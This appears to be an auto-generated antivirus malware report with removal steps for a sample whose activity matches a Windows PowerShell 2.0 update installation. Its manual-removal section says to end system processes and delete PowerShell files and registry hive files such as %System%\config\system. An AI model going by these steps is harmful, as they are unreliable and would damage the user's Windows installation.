df4217ddb34a0b73dc7aac7829371c0cc:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9fc:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll
95b7f12a557dedac5e4a1e9afa5e73abc:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll
a94243b797377ba03b63fc716c13bcf5c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll
7943a80f1a6fd37969aacd411b511f91c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll
2c9c9ae86eb2b4e78c8e09deb7509a63c:\WINDOWS\system32\WsmAuto.dll
67146d3606be1111a39f0fd61f47e9b6c:\WINDOWS\system32\WsmRes.dll
18f347402da544a780949b8fdf83351bc:\WINDOWS\system32\WsmSvc.dll
296e6992278fea7140d88b603e6c2a8ac:\WINDOWS\system32\WsmWmiPl.dll
8c386819bf5b39d7a4b274d0b55f87a5c:\WINDOWS\system32\pwrshplugin.dll
84e025b1259c66315f4d45a6caecacc9c:\WINDOWS\system32\wevtfwd.dll
cd17705af8e53a82facb545a213ab09cc:\WINDOWS\system32\winrmprov.dll
afdf7654880ce23005014895b129d948c:\WINDOWS\system32\winrs.exe
3e9b11880ae4a8ff399ce0573c82655bc:\WINDOWS\system32\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991c:\WINDOWS\system32\winrshost.exe
b84092e52861a026fc83bcede4a7abfac:\WINDOWS\system32\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1c:\WINDOWS\system32\winrssrv.dll
972916faac89c4aa978952b30f478e81c:\WINDOWS\system32\wsmanhttpconfig.exe
23ce21efc2ae95700f2b1f9582fe3867c:\WINDOWS\system32\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2c:\WINDOWS\system32\wsmprovhost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1076
    mofcomp.exe:2912
    WindowsXP-KB968930-x86-ENG.exe:472
    ngen.exe:308
    ngen.exe:3824
    ngen.exe:3776
    ngen.exe:3864
    ngen.exe:3736
    ngen.exe:3832
    ngen.exe:3792
    ngen.exe:320
    ngen.exe:1504
    ngen.exe:3760
    ngen.exe:3816
    ngen.exe:3660
    ngen.exe:3748
    ngen.exe:3728
    ngen.exe:3720
    ngen.exe:3704
    ngen.exe:1848
    ngen.exe:3784
    ngen.exe:3684
    ngen.exe:3840
    ngen.exe:1532
    ngen.exe:3848
    ngen.exe:1740
    update.exe:1988
    mscorsvw.exe:2712
    mscorsvw.exe:592
    mscorsvw.exe:4084
    mscorsvw.exe:3712
    mscorsvw.exe:3000
    mscorsvw.exe:2784
    mscorsvw.exe:1632
    mscorsvw.exe:2208
    mscorsvw.exe:3252
    mscorsvw.exe:2348
    mscorsvw.exe:3972
    mscorsvw.exe:2176
    mscorsvw.exe:2748
    mscorsvw.exe:2264
    mscorsvw.exe:3668
    mscorsvw.exe:2588
    mscorsvw.exe:3520
    mscorsvw.exe:2956
    mscorsvw.exe:2088
    mscorsvw.exe:3784
    mscorsvw.exe:2572
    mscorsvw.exe:1028
    mscorsvw.exe:2108
    mscorsvw.exe:2536
    mscorsvw.exe:1368
    PSCustomSetupUtil.exe:3940
    PSCustomSetupUtil.exe:3908
    PSCustomSetupUtil.exe:2968
    PSCustomSetupUtil.exe:4016
    PSCustomSetupUtil.exe:3060
    PSCustomSetupUtil.exe:3308
    PSCustomSetupUtil.exe:2944
    PSCustomSetupUtil.exe:3008
    PSCustomSetupUtil.exe:3348
    PSCustomSetupUtil.exe:3432
    PSCustomSetupUtil.exe:3100
    PSCustomSetupUtil.exe:3124
    PSCustomSetupUtil.exe:3184
    PSCustomSetupUtil.exe:3892
    PSCustomSetupUtil.exe:3992
    PSCustomSetupUtil.exe:3872
    PSCustomSetupUtil.exe:3404
    PSCustomSetupUtil.exe:3284
    PSCustomSetupUtil.exe:3248
    PSCustomSetupUtil.exe:4052
    PSCustomSetupUtil.exe:3224
    PSCustomSetupUtil.exe:4076
    PSCustomSetupUtil.exe:3372
    PSCustomSetupUtil.exe:3032
    PSCustomSetupUtil.exe:3964
    PSCustomSetupUtil.exe:3156
    PSSetupNativeUtils.exe:1552
    regsvr32.exe:1992
    regsvr32.exe:1496
    wsmanhttpconfig.exe:2816
    wsmanhttpconfig.exe:2876

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\c8295f778ef1610270\system.management.automation.resources.dll (3153 bytes)
    C:\c8295f778ef1610270\about_pssession_details.help.txt (9 bytes)
    C:\c8295f778ef1610270\about_parsing.help.txt (2 bytes)
    C:\c8295f778ef1610270\about_pssessions.help.txt (9 bytes)
    C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\c8295f778ef1610270\spmsg.dll (495 bytes)
    C:\c8295f778ef1610270\update (4 bytes)
    C:\c8295f778ef1610270\about_data_sections.help.txt (5 bytes)
    C:\c8295f778ef1610270\eventforwarding.adm (2 bytes)
    C:\c8295f778ef1610270\powershellcore.format.ps1xml (1492 bytes)
    C:\c8295f778ef1610270\wsmauto.dll (1842 bytes)
    C:\c8295f778ef1610270\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\c8295f778ef1610270\about_regular_expressions.help.txt (5 bytes)
    C:\c8295f778ef1610270\wsmtxt.xsl (2 bytes)
    C:\c8295f778ef1610270\about_windows_powershell_ise.help.txt (6 bytes)
    C:\c8295f778ef1610270\about_objects.help.txt (2 bytes)
    C:\c8295f778ef1610270\about_trap.help.txt (10 bytes)
    C:\c8295f778ef1610270\microsoft.wsman.management.resources.dll (13 bytes)
    C:\c8295f778ef1610270\about_try_catch_finally.help.txt (7 bytes)
    C:\c8295f778ef1610270\wtrinstaller.ico (4803 bytes)
    C:\c8295f778ef1610270\wsmprovhost.exe (657 bytes)
    C:\c8295f778ef1610270\system.management.automation.dll-help.xml (16567 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.editor.dll (14450 bytes)
    C:\c8295f778ef1610270\about_methods.help.txt (6 bytes)
    C:\c8295f778ef1610270\wsmpty.xsl (1 bytes)
    C:\c8295f778ef1610270\about_preference_variables.help.txt (37 bytes)
    C:\c8295f778ef1610270\about_quoting_rules.help.txt (659 bytes)
    C:\c8295f778ef1610270\about_scopes.help.txt (76 bytes)
    C:\c8295f778ef1610270\about_parameters.help.txt (9 bytes)
    C:\$Directory (800 bytes)
    C:\c8295f778ef1610270\about_ref.help.txt (1 bytes)
    C:\c8295f778ef1610270\wsmres.dll (6164 bytes)
    C:\c8295f778ef1610270\about_commonparameters.help.txt (12 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\c8295f778ef1610270\about_transactions.help.txt (1011 bytes)
    C:\c8295f778ef1610270\about_remote_jobs.help.txt (13 bytes)
    C:\c8295f778ef1610270\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.security.resources.dll (9 bytes)
    C:\c8295f778ef1610270\wsmanhttpconfig.exe (3009 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\c8295f778ef1610270\about_command_precedence.help.txt (8 bytes)
    C:\c8295f778ef1610270\about_prompts.help.txt (7 bytes)
    C:\c8295f778ef1610270\about_command_syntax.help.txt (5 bytes)
    C:\c8295f778ef1610270\about_remote_output.help.txt (887 bytes)
    C:\c8295f778ef1610270\about_locations.help.txt (794 bytes)
    C:\c8295f778ef1610270\about_environment_variables.help.txt (417 bytes)
    C:\c8295f778ef1610270\about_types.ps1xml.help.txt (481 bytes)
    C:\c8295f778ef1610270\windowsremoteshell.adm (12 bytes)
    C:\c8295f778ef1610270\wsmwmipl.dll (2816 bytes)
    C:\c8295f778ef1610270\about_throw.help.txt (5 bytes)
    C:\c8295f778ef1610270\about_arithmetic_operators.help.txt (168 bytes)
    C:\c8295f778ef1610270\about_assignment_operators.help.txt (379 bytes)
    C:\c8295f778ef1610270\update\updspapi.dll (5940 bytes)
    C:\c8295f778ef1610270\pwrshplugin.dll (802 bytes)
    C:\c8295f778ef1610270\about_wildcards.help.txt (3 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\c8295f778ef1610270\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\c8295f778ef1610270\winrshost.exe (22 bytes)
    C:\c8295f778ef1610270\microsoft.wsman.management.dll (5010 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\c8295f778ef1610270\winrmprov.mof (789 bytes)
    C:\c8295f778ef1610270\update\eula.txt (586 bytes)
    C:\c8295f778ef1610270\winrm.ini (1956 bytes)
    C:\c8295f778ef1610270\about_bits_cmdlets.help.txt (7 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\c8295f778ef1610270\about_arrays.help.txt (8 bytes)
    C:\c8295f778ef1610270\about_continue.help.txt (1 bytes)
    C:\c8295f778ef1610270\about_core_commands.help.txt (221 bytes)
    C:\c8295f778ef1610270\about_redirection.help.txt (2 bytes)
    C:\c8295f778ef1610270\about_variables.help.txt (6 bytes)
    C:\c8295f778ef1610270\pwrshmsg.dll (4 bytes)
    C:\c8295f778ef1610270\pwrshsip.dll (24 bytes)
    C:\c8295f778ef1610270\about_split.help.txt (10 bytes)
    C:\c8295f778ef1610270\about_history.help.txt (3 bytes)
    C:\c8295f778ef1610270\about_profiles.help.txt (457 bytes)
    C:\c8295f778ef1610270\registry.format.ps1xml (20 bytes)
    C:\c8295f778ef1610270\powershell_ise.exe (2526 bytes)
    C:\c8295f778ef1610270\dotnettypes.format.ps1xml (266 bytes)
    C:\c8295f778ef1610270\about_script_internationalization.help.txt (9 bytes)
    C:\c8295f778ef1610270\about_while.help.txt (2 bytes)
    C:\c8295f778ef1610270\powershell.exe (7339 bytes)
    C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\c8295f778ef1610270\about_eventlogs.help.txt (5 bytes)
    C:\c8295f778ef1610270\winrmprov.dll (591 bytes)
    C:\c8295f778ef1610270\about_pipelines.help.txt (411 bytes)
    C:\c8295f778ef1610270\wsmplpxy.dll (603 bytes)
    C:\c8295f778ef1610270\powershell.exe.mui (10 bytes)
    C:\c8295f778ef1610270\about_type_operators.help.txt (5 bytes)
    C:\c8295f778ef1610270\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\c8295f778ef1610270\about_return.help.txt (3 bytes)
    C:\c8295f778ef1610270\about_functions_advanced.help.txt (3 bytes)
    C:\c8295f778ef1610270\about_properties.help.txt (7 bytes)
    C:\c8295f778ef1610270\types.ps1xml (2510 bytes)
    C:\c8295f778ef1610270\about_if.help.txt (3 bytes)
    C:\c8295f778ef1610270\powershell_ise.resources.dll (4 bytes)
    C:\c8295f778ef1610270\about_aliases.help.txt (6 bytes)
    C:\c8295f778ef1610270\about_escape_characters.help.txt (2 bytes)
    C:\c8295f778ef1610270\about_join.help.txt (2 bytes)
    C:\c8295f778ef1610270\update\update.ver (14 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\c8295f778ef1610270\pssetupnativeutils.exe (9 bytes)
    C:\c8295f778ef1610270\about_language_keywords.help.txt (11 bytes)
    C:\c8295f778ef1610270\about_line_editing.help.txt (1 bytes)
    C:\c8295f778ef1610270\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\c8295f778ef1610270\update\update.exe (10748 bytes)
    C:\c8295f778ef1610270\about_signing.help.txt (12 bytes)
    C:\c8295f778ef1610270\bitstransfer.psd1 (950 bytes)
    C:\c8295f778ef1610270\about_reserved_words.help.txt (1 bytes)
    C:\c8295f778ef1610270\about_logical_operators.help.txt (2 bytes)
    C:\c8295f778ef1610270\winrscmd.dll (2907 bytes)
    C:\c8295f778ef1610270\about_requires.help.txt (2 bytes)
    C:\c8295f778ef1610270\microsoft.wsman.runtime.dll (33 bytes)
    C:\c8295f778ef1610270\about_modules.help.txt (13 bytes)
    C:\c8295f778ef1610270\about_for.help.txt (146 bytes)
    C:\c8295f778ef1610270\bitstransfer.format.ps1xml (16 bytes)
    C:\c8295f778ef1610270\about_break.help.txt (792 bytes)
    C:\c8295f778ef1610270\about_jobs.help.txt (12 bytes)
    C:\c8295f778ef1610270\about_comment_based_help.help.txt (595 bytes)
    C:\c8295f778ef1610270\about_remote_troubleshooting.help.txt (146 bytes)
    C:\c8295f778ef1610270\diagnostics.format.ps1xml (590 bytes)
    C:\c8295f778ef1610270\about_debuggers.help.txt (21 bytes)
    C:\c8295f778ef1610270\about_remote.help.txt (7 bytes)
    C:\c8295f778ef1610270\update\kb968930xp.cat (512 bytes)
    C:\c8295f778ef1610270\winrs.exe (1154 bytes)
    C:\c8295f778ef1610270\winrm.vbs (2727 bytes)
    C:\c8295f778ef1610270\help.format.ps1xml (3947 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\c8295f778ef1610270\about_scripts.help.txt (12 bytes)
    C:\c8295f778ef1610270\getevent.types.ps1xml (15 bytes)
    C:\c8295f778ef1610270\importallmodules.psd1 (438 bytes)
    C:\c8295f778ef1610270\wsmauto.mof (4 bytes)
    C:\c8295f778ef1610270\profile.ps1 (772 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\c8295f778ef1610270\about_hash_tables.help.txt (6 bytes)
    C:\c8295f778ef1610270\about_switch.help.txt (489 bytes)
    C:\c8295f778ef1610270\winrssrv.dll (12 bytes)
    C:\c8295f778ef1610270\powershelltrace.format.ps1xml (344 bytes)
    C:\c8295f778ef1610270\winrsmgr.dll (2 bytes)
    C:\c8295f778ef1610270\about_operators.help.txt (770 bytes)
    C:\c8295f778ef1610270\about_foreach.help.txt (10 bytes)
    C:\c8295f778ef1610270\about_automatic_variables.help.txt (14 bytes)
    C:\c8295f778ef1610270\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\c8295f778ef1610270\about_functions_advanced_methods.help.txt (9 bytes)
    C:\c8295f778ef1610270\certificate.format.ps1xml (155 bytes)
    C:\c8295f778ef1610270\wevtfwd.dll (3351 bytes)
    C:\c8295f778ef1610270\about_format.ps1xml.help.txt (17 bytes)
    C:\c8295f778ef1610270\about_remote_requirements.help.txt (6 bytes)
    C:\c8295f778ef1610270\pspluginwkr.dll (1756 bytes)
    C:\c8295f778ef1610270\about_special_characters.help.txt (3 bytes)
    C:\c8295f778ef1610270\about_comparison_operators.help.txt (11 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\c8295f778ef1610270\about_functions.help.txt (586 bytes)
    C:\c8295f778ef1610270\about_script_blocks.help.txt (3 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\c8295f778ef1610270\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\c8295f778ef1610270\pscustomsetuputil.exe (316 bytes)
    C:\c8295f778ef1610270\windowsremotemanagement.adm (574 bytes)
    C:\c8295f778ef1610270\about_remote_faq.help.txt (775 bytes)
    C:\c8295f778ef1610270\about_pssnapins.help.txt (6 bytes)
    C:\c8295f778ef1610270\about_job_details.help.txt (824 bytes)
    C:\c8295f778ef1610270\windowspowershellhelp.chm (26041 bytes)
    C:\c8295f778ef1610270\$shtdwn$.req (788 bytes)
    C:\c8295f778ef1610270\about_session_configurations.help.txt (276 bytes)
    C:\c8295f778ef1610270\update\spcustom.dll (23 bytes)
    C:\c8295f778ef1610270\about_do.help.txt (2 bytes)
    C:\c8295f778ef1610270\spuninst.exe (3787 bytes)
    C:\c8295f778ef1610270\about_execution_policies.help.txt (13 bytes)
    C:\c8295f778ef1610270\winrm.cmd (35 bytes)
    C:\c8295f778ef1610270\about_wmi_cmdlets.help.txt (8 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\c8295f778ef1610270\spupdsvc.exe (287 bytes)
    C:\c8295f778ef1610270\update\update.inf (2457 bytes)
    C:\c8295f778ef1610270\about_path_syntax.help.txt (5 bytes)
    C:\c8295f778ef1610270\filesystem.format.ps1xml (133 bytes)
    C:\c8295f778ef1610270\default.help.txt (2 bytes)
    C:\c8295f778ef1610270\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\c8295f778ef1610270\wsmsvc.dll (15909 bytes)
    C:\c8295f778ef1610270\wsman.format.ps1xml (837 bytes)
    C:\c8295f778ef1610270\about_providers.help.txt (59 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)
    %System%\SETBF.tmp (42 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %WinDir%\inf\oem10.PNF (9992 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %WinDir%\msmqinst.log (5240 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (8361 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\SET10.tmp (2 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (6108 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %WinDir%\SECD0.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %WinDir%\imsins.log (3604 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1025 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %WinDir%\iis6.log (138978 bytes)
    %WinDir%\comsetup.log (48646 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (242973 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %WinDir%\ntdtcsetup.log (22997 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
